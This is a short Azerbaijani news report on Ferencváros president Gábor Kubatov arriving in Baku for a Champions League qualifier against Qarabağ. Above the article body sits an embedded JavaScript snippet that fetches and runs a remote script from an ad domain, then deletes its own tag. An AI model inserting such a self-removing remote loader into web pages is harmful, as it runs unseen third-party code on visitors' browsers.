“Ferentsvaroş”un əslən azərbaycanlı prezidenti Bakıya gəlib

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Macarıstanın “Ferentsvaroş” klubunun əslən azərbaycanlı prezidenti Qabor Kubatov Bakıya gəlib.

Budapeşt təmsilçisinə yaxın mənbədən “Report”a verilən məlumata görə, o, şəxsi təyyarəsi ilə yenicə Heydər Əliyev Beynəlxalq Aeroportuna enib.

Funksioner Qarabağ”a qarşı keçirəcəkləri UEFA Çempionlar Liqasının III təsnifat mərhələsinin ilk oyununu izləmək üçün Azərbaycan paytaxtına təşrif buyurub.

Kubatovun Azərbaycanla bağlılığına da toxunan mənbə bildirib ki, Macarıstan parlamentinin deputatı vikipediyada naxçıvanlı kimi göstərilsə də, onun anası əslən Quba yəhudilərindədir: “Onların təqribən 100 il öncə Macarıstana köçdükləri barədə məlumatlar var”.

Qeyd edək ki, avqustun 3-də Tofiq Bəhramov adına Respublika stadionunda keçiriləcək “Qarabağ” – “Ferentsvaroş” matçı saat 20:00-da başlayacaq. Cavab görüşü avqustun 9-da Budapeştdə olacaq.

Oxu.az

Bu yazılara da göz atın...